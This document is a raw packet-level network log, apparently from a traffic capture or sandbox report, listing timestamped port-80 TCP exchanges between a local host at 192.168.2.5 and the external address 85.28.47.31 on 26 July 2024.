Jul 26, 2024 17:56:15.896116972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.896145105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.896174908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.896222115 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.896297932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.896315098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.896330118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.896344900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.896349907 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.896361113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.896368980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.896375895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.896395922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.896406889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.896413088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.896431923 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.896620989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.896636963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.896648884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.896655083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.896670103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.896697044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.896830082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.896845102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.896862030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.896877050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.896893024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.896895885 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.896903992 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.896908045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.896923065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.896935940 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.896967888 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.897527933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897546053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897561073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897576094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897581100 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.897592068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897607088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897614002 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.897622108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897636890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897648096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.897651911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897666931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897671938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.897694111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.897695065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897708893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897723913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897723913 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.897738934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897744894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.897753954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897770882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897780895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.897787094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897803068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897809029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.897818089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897840023 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.897840977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897856951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897869110 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.897872925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897890091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897890091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.897906065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897912025 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.897921085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897936106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897945881 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.897950888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897965908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897980928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.897983074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.897998095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.898003101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.898013115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.898027897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.898030043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.898057938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.898085117 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.898721933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.898746014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.898761034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.898770094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.898777008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.898786068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.898792028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.898806095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.898807049 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.898821115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.898830891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.898839951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.898854971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.898854971 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.898870945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.898883104 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.898885012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.898900986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.898911953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.898916006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.898926973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.898931026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.898946047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.898961067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.898963928 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.898974895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.898987055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.898989916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.899003029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.899004936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.899022102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.899032116 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.899059057 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.899858952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.899873018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.899888039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.899905920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.899918079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.899919987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.899935961 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.899950027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.899951935 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.899966002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.899980068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.899981976 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.899996042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.900007010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.900052071 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.900052071 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.961674929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.961714029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.961730957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.961766958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.961780071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.961795092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.961802006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.961903095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.961904049 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.961904049 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.041676044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.041744947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.041759968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.041835070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.041851044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.041866064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.041882038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.041954994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.041954994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.041954994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.054056883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.054148912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.054167986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.054189920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.054245949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.054266930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.054287910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.054291964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.054291964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.054307938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.054322958 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.054322958 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.054331064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.054342985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.054359913 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.054383039 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.054405928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.054435968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.054451942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.054455996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.054478884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.054478884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.054500103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.054507017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.054522991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.054522991 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.054546118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.054547071 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.054563999 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.054589987 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.054862022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.054883003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.054903030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.054907084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.054923058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.054928064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.054944038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.054946899 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.054965973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.054975033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.054985046 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.054996014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055018902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055018902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055041075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055043936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055063963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055063963 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055083990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055084944 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055104971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055105925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055124044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055140018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055145979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055160046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055181026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055181980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055201054 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055201054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055221081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055223942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055238008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055241108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055262089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055264950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055286884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055294037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055309057 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055314064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055334091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055335999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055356026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055361032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055376053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055380106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055397987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055397987 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055418015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055423021 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055438042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055444002 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055458069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055461884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055478096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055484056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055499077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055500984 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055519104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055525064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055538893 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055538893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055556059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055560112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055578947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055579901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055600882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055605888 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055623055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.055624008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055646896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.055665016 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056010962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056029081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056047916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056068897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056085110 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056085110 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056092024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056094885 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056112051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056118965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056137085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056138992 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056159019 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056169987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056174994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056190968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056211948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056214094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056231022 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056238890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056260109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056266069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056279898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056293964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056299925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056313038 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056320906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056338072 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056340933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056350946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056360960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056368113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056382895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056387901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056406021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056408882 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056426048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056430101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056447983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056451082 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056466103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056471109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056500912 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056504011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056507111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056524038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056544065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056545973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056564093 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056565046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056581020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056586027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056605101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056608915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056627989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.056631088 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056648016 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.056668043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.057015896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.057038069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.057058096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.057063103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.057080030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.057080984 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.057099104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.057106018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.057125092 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.057136059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.057152033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.057157040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.057177067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.057197094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.057198048 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.057204008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.057218075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.057221889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.057238102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.057251930 CEST	49704	80	192.168.2.5	85.28.47.31
